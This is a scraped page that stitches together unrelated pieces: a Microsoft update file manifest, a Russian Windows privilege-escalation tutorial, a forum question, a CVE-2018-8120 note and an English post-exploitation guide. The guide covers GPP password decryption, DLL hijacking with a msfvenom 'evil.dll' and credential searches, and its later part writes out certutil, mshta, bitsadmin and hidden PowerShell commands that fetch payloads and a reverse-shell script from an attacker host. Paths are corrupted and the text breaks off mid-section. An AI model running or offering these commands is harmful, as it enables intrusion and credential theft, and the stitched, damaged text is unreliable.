20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,102

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,141

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,162

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

Дополнительные файлы для всех поддерживаемых версий Windows Server 2008 R2 для систем на базе процессоров IA-64

File name

Ia64_513b1c3e9afe5ba886d084975192121f_31bf3856ad364e35_6.1.7600.16979_none_7192b34e49599c24.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Ia64_d32ce658e753e0010e5de82990d78b0a_31bf3856ad364e35_6.1.7601.17796_none_0ae8a331af75afdd.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Ia64_d96d854a5b272813cff47e06667db9ac_31bf3856ad364e35_6.1.7600.21172_none_6c9ffe8f5f4ddb54.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Ia64_ee1955e5ac4d558d851964e3b854b8f9_31bf3856ad364e35_6.1.7601.21946_none_9b2798fa0abbf5b7.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.16979_none_e182ea1d1bb56755.manifest

File version

Not Applicable

File size

8,988

Date (UTC)

17-Mar-2012

Time (UTC)

08:38

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.21172_none_e2055d0434d98900.manifest

File version

Not Applicable

File size

8,988

Date (UTC)

17-Mar-2012

Time (UTC)

08:43

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.17796_none_e350a66d18eebf1e.manifest

File version

Not Applicable

File size

8,988

Date (UTC)

17-Mar-2012

Time (UTC)

08:41

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.21946_none_e41054ba31e3d05a.manifest

File version

Not Applicable

File size

8,988

Date (UTC)

17-Mar-2012

Time (UTC)

08:22

Platform

Not Applicable

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,804

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

2,716

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,999

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

2,517

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm_bf~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,458

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,477

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1_bf~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,436

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,455

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

1,918

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

Время прочтения
10 мин

Просмотры 38K

Решил для себя и для тех, кому будет полезно, собрать все что знаю, но не помню по теме, в этой статье. Делитесь советами. Основным источником этой статьи является эта.

Я вольно перевел и добавил немного от себя, того, что насобирал и узнал из других источников.

В общем, тут представлены способы, которые помогут нам достигнуть цели повышения привилегий.

Отправной точкой для этой небольшой статьи является непривилегированная оболочка (учетная запись). Возможно, мы использовали эксплойт или провели атаку и получили эту оболочку.

В принципе, в начальный момент времени мы не понимаем машину: что она делает, к чему она подключена, какой уровень привилегий у нас есть или даже какая это операционная система.

Сначала нам нужно получить нужную нам информацию, чтобы понять, где мы вообще находимся и что имеем:

systeminfo | findstr /B /C:"Название ОС" /C:"Версия ОС"

Эта команда позволяет определить, как из нее видно, Название и версию ОС. Можно выполнить ее и без параметров, тогда вывод команды будет более полным, но нам достаточно и этого.

Далее важно узнать имя машины и имя пользователя, под которым мы подключились.

  • hostname — имя пользователя.
  • echo %username% — имя пользователя.

Далее посмотрим, какие пользователи есть еще на данном хосте и получим более подробную информацию о своем пользователе.

  • net users — другие пользователи
  • net user user1 — детальная информация по пользователю, где user1 — имя вашего пользователя.

Получив информацию об учетке, посмотрим информацию о сетевом взаимодействии данного хоста.

Сначала глянем на имеющиеся интерфейсы и таблицу маршрутизации.

  • ipconfig /all — информация об имеющихся интерфейсах.
  • route print — таблица маршрутизации
  • arp -A — таблица arp записей

Далее посмотрим активные сетевые подключения и правила брандмауэра.

  • netstat -ano — активные сетевые подключения.

-a — запуск с данным параметром выведет на экран все активные подключения TCP, а также порты TCP и UDP, прослушиваемые системой;
-n — параметр позволяет показать активные подключения TCP с адресами и номерами портов;
-o — так же, как и предыдущий ключ, выводит активные TCP подключения, но в статистику добавлены коды процессов, по ним уже можно точно определить, какое именно приложение использует подключение.

  • netsh firewall show state — статус брандмауэра
  • netsh firewall show config — конфигурация брандмауэра

Наконец, мы кратко рассмотрим, что работает на скомпрометированном хосте: запланированные задачи, запущенные процессы, запущенные службы и установленные драйверы.

schtasks /query /fo LIST /v

где
/query — Вывод данных о всех запланированных задачах,
/fo LIST — Вывод в список.
/v — Вывод подробных сведений о задании.

Следующая команда связывает запущенные процессы с запущенными службами.

tasklist /SVC

где,
/SVC — Отображение служб для каждого процесса.

Также посмотрим список запущенных служб Windows.

net start

Полезно также посмотреть информацию о драйверах скомпрометированной системы.

DRIVERQUERY

Далее хочется упомянуть о, наверное, самой полезной команде Windows — wmic. Команда WMIC (Windows Management Instrumentation Command) используется для получения сведений об оборудовании и системе, управления процессами и их компонентами, а также изменения настроек с использованием возможностей инструментария управления Windows (Windows Management Instrumentation или WMI). Хорошее описание.

К сожалению, некоторые конфигурации Windows по умолчанию не разрешают доступ к WMIC, если пользователь не входит в группу Администраторов (что действительно хорошая идея). Любая версия XP не позволяла доступ к WMIC с непривилегированной учетной записи.

Напротив, Windows 7 Professional и Windows 8 Enterprise по умолчанию позволяли пользователям с низкими привилегиями использовать WMIC.

По обычаю — параметры программы:

wmic /?

Хороший скрипт по сбору инфы через wmic.

Прежде чем идти дальше стоит пробежаться по собранной информации. Также стоит обратить внимание на установленные в системе патчи, так как любая информация о дырах в системе даст нам дополнительную опору для повышения своих привилегий. По номеру HotFix можно поискать уязвимости по повышению привилегий.

Далее мы рассмотрим автоматическую установку. Если существует необходимость установки и настройки большого парка машин, то как правило, технический персонал не будет перемещаться от машины к машине для настройки персонального каждой. Существует несколько решений для автоматической установки. Для нас не так важно, что это за методы и как они работают, а важно то, что они оставляют конфигурационные файлы, которые используются для процесса установки, содержащие много конфиденциальной информации, такой как ключ продукта операционной системы и пароль администратора. Что нас больше всего интересует, так это пароль администратора, который мы можем использовать для повышения наших привилегий.

Как правило, это следующие каталоги:

  • c:sysprep.inf
  • c:sysprepsysprep.xml
  • %WINDIR%PantherUnattendUnattended.xml
  • %WINDIR%PantherUnattended.xml

Но стоит проверить и всю систему.

Данные файлы содержат пароли в открытом виде или кодировке BASE64.
Примеры:

Sysprep.inf — пароль в открытом виде.

»

Sysprep.xml — пароль в кодировке base64.

»

Unattended.xml — пароль в кодировке base64.

Также для хостов, подключенных к домену можно поискать файл Group.xml, который содержит зашифрованный AES256 пароль, но который можно расшифровать, т.к. ключ выложен на msdn (https://msdn.microsoft.com/en-us/library/cc422924.aspx) и других источниках. Но это в случае, если используется политика создания локальных пользователей на хостах или, например, задании пароля локальному Администратору.

Например, у меня лежит тут:

Открыв его, ищем параметр “cpassword”.

Далее нужно расшифровать данную последовательность. Используем, например, CrypTool. Сначала раскодируем Base64.
Особенности Base64 в том, что его длина должна быть кратна 4. Поэтому считаем блоки по 4, и если в последнем блоке не хватает символов, то недостающие дописываем символами «=».
У меня вышло 2 «=».

Далее расшифруем. Применяя тот ключ, что выше.

Убираем лишние точки, разделяющие знаки и получаем пароль.

В дополнение к Group.xml вот несколько других файлов предпочтений политики, которые могут иметь дополнительный набор атрибутов «cPassword”:

  • ServicesServices.xml
  • ScheduledTasksScheduledTasks.xml
  • PrintersPrinters.xml
  • DrivesDrives.xml
  • DataSourcesDataSources.xml

Однако мы все любим автоматизированные решения, поэтому мы можем добраться до финиша как можно быстрее. Здесь есть два основных варианта, в зависимости от типа оболочки/доступа, который у нас есть. Существует модуль metasploit, который может быть выполнен через установленную сессию (https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp) или Вы можете использовать Get-GPPPassword, который является частью PowerSploit.

Ладно, дальше. Будем искать странный параметр реестра „AlwaysInstallElevated“. Данный параметр разрешает непривилегированным пользователям устанавливать .msi файлы из-под NT AUTHORITYSYSTEM.

Для того, чтобы иметь возможность использовать это, мы должны проверить, что оба раздела реестра установлены, и если это так, мы можем получить SYSTEM shell. Проверим:

reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated

reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated

В состав Metasploit входит специальный модуль exploit/windows/local/always_install_elevated, который создает MSI-файл со встроенным в него специальным исполняемым файлом, который извлекается и выполняется установщиком с привилегиями системы. После его выполнения msi-файл прекращает установку, чтобы предотвратить регистрацию действия в системе. К тому же если запустить установку с ключом /quiet, то даже не выведется ошибка.

Ну и немного полезных команд по поиску по системе:

Команда ниже будет искать в файловой системе имена файлов, содержащие определенные ключевые слова. Вы можете указать любое количество ключевых слов.

dir /s *pass* == *cred* == *vnc* == *.config*

Поиск определенных типов файлов по ключевому слову, эта команда может генерировать много выходных данных.

findstr /si password *.xml *.ini *.txt

Аналогично две команды ниже могут быть использованы для grep реестра по ключевым словам, в данном случае „password“.

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

На данный момент у нас уже есть достаточно, чтобы получить системный шел. Но есть еще пара направленbй атаки для получения желаемого результата: мы рассмотрим службы Windows и разрешения для файлов и папок. Наша цель здесь — использовать слабые разрешения для повышения привилегий сеанса.

Мы будем проверять много прав доступа, в этом нам поможет accesschk.exe, который является инструментом от Microsoft Sysinternals Suite. Microsoft Sysinternals содержит много отличных инструментов. Пакет можно загрузить с сайта Microsoft technet (https://docs.microsoft.com/ru-ru/sysinternals/downloads/sysinternals-suite).

Мы можем проверить необходимый уровень привилегий для каждой службы с помощью accesschk.

Мы можем видеть разрешения, которые имеет каждый уровень пользователя.

Accesschk может автоматически проверять, есть ли у нас доступ на запись к службе Windows с определенным уровнем пользователя. Как правило, как пользователь с низкими привилегиями, мы хотим проверить „Пользователей“. Удостоверьтесь, что проверили, к каким группам пользователей вы принадлежите.

-c В качестве имени указана служба Windows, например ssdpsrv (укажите “*” для вывода на экран всех служб)
-d Обрабатывать только каталоги
-e Выводить только явным образом заданные уровни целостности (только для ОС Windows Vista)
-k В качестве имени указан раздел реестра, например hklmsoftware
-n Выводить только объекты, не имеющие правил доступа
-p В качестве имени указано имя или идентификатор процесса (PID), например cmd.exe (укажите в качестве имени “*”, чтобы вывести на экран все процессы)
-q Опустить заголовок
-r Выводить только объекты, к которым есть право доступа на чтение
-s Рекурсивная обработка
-v Выводить подробную информацию
-w Выводить только объекты, к которым есть право доступа на запись

Также есть еще одна интересная команда:

autorunsc.exe -a | findstr /n /R "File not found"

Позволяет найти запись в реестре о файле, который запускался автоматически, но сейчас уже отсутствует в системе. Запись могла остаться, если например, сервис был неправильно удален. При каждом запуске система безуспешно пытается запустить этот файл. Этой ситуацией также можно воспользоваться для расширения своих полномочий. Просто на место этого файла можно подставить наш.

Далее рассмотрим две уязвимости:

Первая: реплицируем результаты поста, написанного Parvez из GreyHatHacker; „Elevating privileges by exploiting weak folder permissions“ (http://www.greyhathacker.net/?p=738). 

Этот пример является частным случаем угона dll. Программы обычно не могут функционировать сами по себе, у них есть много ресурсов, которые им нужно подключить (в основном dll, но и собственные файлы). Если программа или служба загружает файл из каталога, к которому у нас есть доступ на запись, мы можем злоупотребить этим, чтобы запустить оболочку с привилегиями, под которыми работает программа.

Как правило, приложение Windows будет использовать предопределенные пути поиска, чтобы найти dll, и он будет проверять эти пути в определенном порядке. Dll угон обычно происходит путем размещения вредоносных dll по одному из этих путей. Эта проблема может быть устранена путем указания приложению абсолютных путей к необходимой dll.

Порядок поиска dll:

  1. Директория с которой запущено приложение
  2. 32-bit System directory (C:WindowsSystem32)
  3. 16-bit System directory (C:WindowsSystem)
  4. Windows directory (C:Windows)
  5. Действующая рабочая директория (CWD)
  6. Directories in the PATH environment variable (system then user)

Иногда приложения пытаются загрузить dll файлы, отсутствующие на машине. Это может произойти по нескольким причинам, например, если библиотека dll требуется только для определенных подключаемых модулей или компонентов, которые не установлены. В этом случае Parvez обнаружил, что некоторые службы Windows пытаются загрузить библиотеки dll, которые не существуют в установках по умолчанию.

Так как dll не существует, мы в конечном итоге прохождения всех путей поиска. Как пользователь с низким уровнем привилегий у нас немного шансов положить вредоносный dll в п. 1-4, 5. Но если у нас есть доступ на запись в любой из каталогов, то наши шансы на победу велики.

Давайте посмотрим, как это работает на практике, для нашего примера мы будем использовать IKEEXT (модули ключей IPSec IKE и AuthIP) сервис, который пытается загрузить wlbsctrl.dll.

Любой каталог в „C:“ даст доступ на запись для аутентифицированных пользователей, это дает нам шанс.

C:Usersuser1Desktop> accesschk.exe -dqv "C:Python27"

C:Python27
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTINAdministrators
        FILE_ALL_ACCESS
  RW NT AUTHORITYSYSTEM
        FILE_ALL_ACCESS
  R  BUILTINUsers
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITYAuthenticated Users
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL

C:Usersuser1Desktop> icacls "C:Python27"

C:Python27 BUILTINAdministrators:(ID)F
            BUILTINAdministrators:(OI)(CI)(IO)(ID)F
            NT AUTHORITYSYSTEM:(ID)F
            NT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F
            BUILTINUsers:(OI)(CI)(ID)R
            NT AUTHORITYAuthenticated Users:(ID)C
            NT AUTHORITYAuthenticated Users:(OI)(CI)(IO)(ID)C

F — полный доступ.
(OI) — наследование объектами.
(CI) — наследование контейнерами.
(IO) — только наследование.
(NP) — запрет на распространение наследования.
(I)- наследование разрешений от родительского контейнера.

Прежде чем перейти к действию, необходимо проверить состояние службы IKEEXT. В этом случае мы можем увидеть, что он установлен на „AUTO_START“!

sc qc IKEEXT

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IKEEXT
        TYPE			: 20  WIN32_SHARE_PROCESS
        START_TYPE		: 2   AUTO_START
        ERROR_CONTROL		: 1   NORMAL
        BINARY_PATH_NAME		: C:Windowssystem32svchost.exe -k netsvcs
        LOAD_ORDER_GROUP		:
        TAG			: 0
        DISPLAY_NAME		: IKE and AuthIP IPsec Keying Modules
        DEPENDENCIES		: BFE
        SERVICE_START_NAME	: LocalSystem

Теперь мы знаем, что у нас есть необходимые условия, и мы можем создать вредоносную dll и перехвата оболочки!

Используем Metasploit -> msfvenom, это например.

После передачи evil.dll на наш целевой компьютер все, что нам нужно сделать, это переименовать его в wlbsctrl.dll и переместить в „C:Python27“. Как только это будет сделано, нам нужно терпеливо ждать перезагрузки машины (или мы можем попытаться принудительно перезагрузить), и мы получим системную оболочку.

copy evil.dll C:Python27wlbsctrl.dll

После этого осталось только дождаться перезагрузки системы. 

Для нашего последнего примера мы рассмотрим запланированные задачи. Опишу принцип, т.к. у всех могут быть разные случаи.

Находим процесс, службу, приложение запускаемое планировщиком задач от SYSTEM.
Проверяем права доступа на папку, где находится наша цель.

accesschk.exe -dqv "путь_к_цели"

Ясно, что это серьезная проблема конфигурации, но еще хуже тот факт, что любой прошедший проверку Пользователь (аутентифицированный пользователь) имеет доступ на запись в эту папку. В этом примере мы можем просто перезаписать двоичный исполняемый файл файлом, сгенерированным в metasploit.

Можно закодировать дополнительно.

Теперь остается только загрузить вредоносный исполняемый файл и перезаписать его в папку выполняемого файла. Как только это будет сделано, мы можем спокойно идти спать и рано с утра получить системный шел.

Эти два примера должны дать нам представление об уязвимостях, которые необходимо искать при рассмотрении разрешений для файлов и папок. Потребуется время, чтобы изучить все пути binpath для служб windows, запланированные задачи и задачи автозапуска.

Напоследок пара советов по использованию accesschk.exe.

Найти все слабые разрешения для папок на диске.

accesschk.exe -uwdqs Users c:
accesschk.exe -uwdqs "Authenticated Users" c:

Найти все слабые разрешения для файлов на диске.

accesschk.exe -uwqs Users c:*.*
accesschk.exe -uwqs "Authenticated Users" c:*.*

Вроде всё.

  • Remove From My Forums
  • Общие обсуждения

  • Добрый день!

    Столкнулся с проблемой что для доступа к предыдущим версиям некоторых папок требуется открывать свойства папки из программы запущенной из-под администратора с повышением привилегий. При том что соседняя папка дает доступ к предыдущим версиям без повышения
    привилегий тем кто имеет доступ хотя бы на чтение.

    Аксес листы на папках настроены аналогично: группы разные но разрешения одинаковые. И пользователю, входящему в обе группы и для первой папки и для второй, в доступе к предыдущим версиям первой папки без повышения привилегий отказывает.

    В чем может быть причина?

    • Изменен тип

      5 декабря 2012 г. 8:53
      Тема переведена в разряд обсуждений по просьбе пользователя

Причина:

Уязвимость возникает из-за того, что компоненты Win32k неправильно обрабатывают объекты в памяти.
 Некоторые версии системы Windows win32k.sys компонентNtUserSetImeInfoEx()Объект нулевого указателя в объекте ядра не проверяется в функции системной службы.,Обычные приложения могут использовать эту уязвимость с нулевым указателем для выполнения произвольного кода с привилегиями ядра.

Затронутая версия:

Windows 7 for 32-bit Systems Service Pack 1  

Windows 7 for x64-based Systems Service Pack 1      

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for Itanium-Based Systems ServicePack 2

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1

Windows Server 2008 R2 for x64-based Systems ServicePack 1

Windows Server 2008 R2 for x64-based Systems ServicePack 1

Способы эскалации прав:

Загрузите CVE после получения пользователя с низкими привилегиями через веб-оболочку-2018-8120.exe в папку

Скачать с помощью инструментов:

https://github.com/alpha1ab/CVE-2018-8120

Справочные материалы:

https://www.freebuf.com/vuls/174183.html

эксперимент:

Windows-Privilege-Escalation

Here is my step-by-step windows privlege escalation methodology. This guide assumes you are starting with a very limited shell like a webshell, netcat reverse shell or a remote telnet connection.

First things first and quick wins

Do some basic enumeration to figure out who we are, what OS this is, what privs we have and what patches have been installed.

whoami
net user <username>
systeminfo
net config Workstation 
net users 

What is running on the machine?
If we are able to run WMIC we can pull rich details on the services and applications running:

wmic service list full > services.txt
wmic process > processes.txt

Or alternatively:

Has a Windows Auto-login Password been set?

reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"

Dump a tree of all the folders / files on the HDD

tree c: > c:userspublicfolders.txt

or for a list of files:

dir /s c: > c:userspublicfiles.txt

Uploading files to the Windows machine

Sometimes we will want to upload a file to the Windows machine in order to speed up our enumeration or to privilege escalate. Often you will find that uploading files is not needed in many cases if you are able to execute PowerShell that is hosted on a remote webserver (we will explore this more in the upgrading Windows Shell, Windows Enumeration and Windows Exploits sections). Uploading files increased the chances of being detected by antivirus and leaves unnecssary data trail behind.
We will look at 4 ways of uploading files to a remote Windows machine from Kali Linux:

  1. VBScript HTTP Downloader
  2. PowerShell HTTP Downloader
  3. Python HTTP Downloader
  4. FTP Downloader

NOTE There are MANY more ways to move files back and forth between a Windows machine, most can be found on the LOLBAS project:
https://lolbas-project.github.io/

Most of these will require that we create a simple local webserver on our Kali box to sevre the files (NOTE: I have had issues running this command within TMUX for whatever reason… so dont run it in TMUX).
I like to use the Python Simple HTTP Server:

root@kali:~/Documents/Exploits/WindowsPRIVZ# python -m SimpleHTTPServer 80

Or the Python pyftpdlib FTP Server (again don’t run from TMUX):

apt-get install python-pyftpdlib
root@kali:~/Documents/Exploits/WindowsPRIVZ# python -m pyftpdlib -p 21

Uploading Files with VBScript

In my experiance, VBScript is one of the easiest methods of transfering files to a remote Windows. The only downside is that the file size you can transfer is rather limited. I often have trouble transfering anything over 1 MB using this method and have to fall back on other methods (Windows-privesc-check2.exe is much too large to transfer using this method).
First lets test to see if we can run VBScript

echo WScript.StdOut.WriteLine "Yes we can run vbscript!" > testvb.vbs

Now we run it to see the results:

If you see the following message, we are good to go with VBScript!:

C:UsersTest>cscript testvb.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Yes we can run vbscript!

If you see the following messages, you should move on to PowerShell:

C:temp>cscript testvb.vbs
This program is blocked by group policy. For more information, contact your system administrator.
C:temp>testvb.vbs
Access is denied.

Now we can create a very simple downloader script by copying and pasting this single line of code into your windows commandline. I have tried to create a VBS script to download files from a remote webserver with the least possible number of lines of VBS code and I believe this is it.
If Windows is an older version of windows (Windows 8 or Server 2012 and below) use the following script:

CMD C:> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")  > dl.vbs &echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> dl.vbs &echo xHttp.Open "GET", WScript.Arguments(0), False  >> dl.vbs &echo xHttp.Send >> dl.vbs & echo bStrm.type = 1 >> dl.vbs &echo bStrm.open >> dl.vbs & echo bStrm.write xHttp.responseBody >> dl.vbs &echo bStrm.savetofile WScript.Arguments(1), 2 >> dl.vbs

If Windows is a newer version (Windows 10 or Server 2016), try the following code:

CMD C:> echo dim xHttp: Set xHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")  > dl.vbs &echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> dl.vbs &echo xHttp.Open "GET", WScript.Arguments(0), False  >> dl.vbs &echo xHttp.Send >> dl.vbs &echo bStrm.type = 1 >> dl.vbs &echo bStrm.open >> dl.vbs &echo bStrm.write xHttp.responseBody >> dl.vbs &echo bStrm.savetofile WScript.Arguments(1), 2 >> dl.vbs

Now try to download a file to the local path:

CMD C:> cscript dl.vbs "http://10.10.10.10/archive.zip" ".archive.zip"

Uploading Files with CertUtil.exe

I’ve found that CertUtil can be quite reliable when all else seems to fail.

certutil.exe -urlcache -split -f http://10.10.10.10/exploit.exe

Transfering Files using MSHTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). And it can also be used to transfer files :D
HTML:

C:>mshta http://10.10.10.10/badthings.exe

FTP:

C:>mshta ftp://10.10.10.10:21/badthings.exe

Trasfering Files using Bitsadmin

Background Intelligent Transfer Service (BITS) is a component of Microsoft Windows XP and later iterations of the operating systems, which facilitates asynchronous, prioritized, and throttled transfer of files between machines using idle network bandwidth. BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center.

C:>bitsadmin /transfer badthings http://10.10.10.10:80/badthings.exe c:userspublicpayload.exe

Uploading Files with PowerShell

Test to see if we can run Powershell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "get-host"

Test to see if we can run Powershell Version 2:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -Version 2 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "$PSVersionTable"

Try to download a file from a remote server to the windows temp folder from the Windows command line:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:\Users\Public\Downloads\exploit.exe")"

Or from a PowerShell… shell:

PS C:> IEX(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:\Users\Public\Downloads\exploit.exe")"

OR This one seems to work better while at the console:

PS C:> IEX(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:UsersPublicDownloadsexploit.exe")

Uploading Files with Python

Sometimes a Windows machine will have development tools like Python installed.
Check for python

Download a file using Python:

python -c "import urllib.request; urllib.request.urlretrieve('http://10.10.10.10/cat.jpg', 'C:\Users\Public\Downloads\cat.jpg');"

Uploading Files with Perl

Sometimes a Windows machine will have development tools like PERL installed.
Check for PERL

Download a file using PERL:

perl -le "use File::Fetch; my $ff = File::Fetch->new(uri => 'http://10.10.10.10/nc.exe'); my $file = $ff->fetch() or die $ff->error;"

Uploading Files with FTP

After running the python ftp lib on (python -m pyftpdlib -p 21) on Kali, you can try connecting using the windows FTP client:

C:Userspwnd>ftp 10.10.10.10
Connected to 10.10.10.10
220 pyftpdlib 1.5.3 ready.
User (10.10.15.31:(none)): anonymous
331 Username ok, send password.
Password: anonymous

230 Login successful.                                                                                                                      
ftp> ls                                                                                                                                 
dir                                                                                                                                       
421 Active data channel timed out.                                                                                                       

If you are seeing a 421 timeout when you try to send a command it is likely because your connection is being blocked by the windows firewall. The Windows command-line ftp.exe supports the FTP active mode only. In the active mode, the server has to connect back to the client to establish data connection for a file transfer.

You can check to see if the remote machine has Winscp.exe installed. Winscp is capable of connecting to an FTP server using passive mode and will not be blocked by the firewall.

Transfering Files via SMB using Impacket

Kali comes loade with the incredible Impacket library which is a swiss army knife of network protocols… just Awesome. You can easily create a SMB share on your local Kali machine and move files between Kali and Windows with ease.
https://github.com/SecureAuthCorp/impacket

First we will setup the SMB Share on Kali like so:

root@kali:~# impacket-smbserver root /root/Desktop
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
                                                                    

Confirm it is up and running using Net View on the Windows command line:

C:UsersNull>net view \192.168.0.49
Shared resources at \192.168.0.49

(null)

Share name  Type  Used as  Comment

-------------------------------------------------------------------------------
smbshare    Disk
The command completed successfully.

Then we can trasnfer files from the command line as if it were a normal folder:

C:UsersAdmin>dir \192.168.0.49smbshare 
C:UsersAdmin>copy \192.168.0.49smbshareloot.zip .  

By far the most interesting feature of the SMB Share method is that you can execute files directly over the SMB Share without copying them to the remote machine (fileless execution is so hot right now):

C:UsersAdmin>\192.168.0.49smbsharepayload.exe

A fancy trick I learned from IPPSec is to create a mapped drive to a remote SMB share like so:

net use y: \192.168.0.49smbshare  
y: 
dir 

Execute a remote shell dropper

Often, you can leverage PowerShell to execute a remotely hosted powershell script which contains a shell dropper (generated by the platform of your choosing).

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -WindowStyle hidden -NonInteractive -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

There are also some no-so-well documented PowerShell argument shortcuts so can use things like -w rather than -WindowsStyle (handy for smaller payloads):

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -w hidden -noni -nop -i None -ex Bypass -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

Upgrading your Windows Shell

You might find that you are connected with a limited shell such as a Web shell, netcat shell or Telnet connection that simply is not cutting it for you. Here are a few oneliners you can use to upgrade your shell:

Upgrade Shell with PowerShell Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

root@kali:~/test# git clone https://github.com/samratashok/nishang.git                                                  
Cloning into 'nishang'...
remote: Enumerating objects: 1612, done.
remote: Total 1612 (delta 0), reused 0 (delta 0), pack-reused 1612
Receiving objects: 100% (1612/1612), 5.87 MiB | 6.62 MiB/s, done.
Resolving deltas: 100% (1010/1010), done.
root@kali:~/test# cd nishang/
root@kali:~/test/nishang# cd Shells/
